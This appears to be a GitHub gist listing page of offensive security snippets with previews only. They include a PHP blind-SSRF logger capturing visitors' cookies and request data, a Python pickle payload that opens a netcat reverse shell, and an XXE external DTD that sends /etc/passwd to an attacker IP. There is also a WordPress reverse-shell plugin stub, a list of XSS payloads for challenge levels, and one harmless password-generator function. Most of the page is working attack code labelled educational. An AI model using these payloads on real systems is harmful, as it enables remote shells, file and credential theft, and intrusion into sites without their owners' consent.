BlackVoidX blackvoidx
blackvoidx
/ blind-ssrf.php
Created
December 14, 2024 08:11
Blind SSRF detection and notify to discord
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| header("Content-Type: image/jpeg"); | |
| $data = "GOT request :\n\n"; | |
| $data .= "Requester: " . $_SERVER['REMOTE_ADDR']; | |
| $data .= "\nForwarded For: " . $_SERVER['HTTP_X_FORWARDED_FOR']; | |
| $data .= "\nUser Agent: " . $_SERVER['HTTP_USER_AGENT']; | |
| $data .= "\nCookie: " . json_encode($_COOKIE); | |
| $data .= "\nBody: " . json_encode($_REQUEST); |
blackvoidx
/ pickleme.py
Created
December 14, 2024 08:09
Insecure Deserialization (Python) lead to reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import sys | |
| import base64 | |
| command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat IP PORT > /tmp/f' | |
| class rce(object): | |
| def __reduce__(self): | |
| import os | |
| return (os.system,(command,)) |
blackvoidx
/ evil.dtd
Created
December 14, 2024 08:06
External dtd XXE attack (educational purposes)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd"> | |
| <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://IP:PORT/?p=%file;'>" > | |
blackvoidx
/ plugin-shell.php
Created
December 14, 2024 08:03
Wordpress plugin shell for educational purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Plugin Name: Reverse Shell | |
| Description: A simple plugin to test reverse shell connections (educational purposes only). | |
| Author: Ethical Tester | |
| Version: 1.0 | |
| */ | |
| function reverse_shell() { | |
| // Replace with your attacker's IP and port |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| randompass() { | |
| local length="${1:-15}" # Default password length is 15 characters | |
| local password | |
| password=$(openssl rand -base64 48 | tr -dc 'a-zA-Z0-9' | head -c "$length") | |
| echo "$password" | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| level-1 => test</title><script>alert(origin)</script> | |
| level-2 => test</noscript><script>alert(origin)</script> | |
| level-3 => red;}</style><script>alert(origin)</script> | |
| level-4 => %26apos;-alert(origin)-%26apos; <- OR -> %26apos;,alert(origin),%26apos; | |
| level-5 => test<img src='x' onerror='alert(origin)'/> | |
| level-6 => "><img src='x' onerror='alert(origin)'/> // | |
| level-7 => '><img src='x' onerror='alert(origin)'\/> | |
| level-8 => "onfocus="eval(alert(origin)) | |
| level-9 => 'onfocus='eval(alert(origin)) | |
| level-10 => test</textarea><img src='x' onerror='alert(origin)'/> // |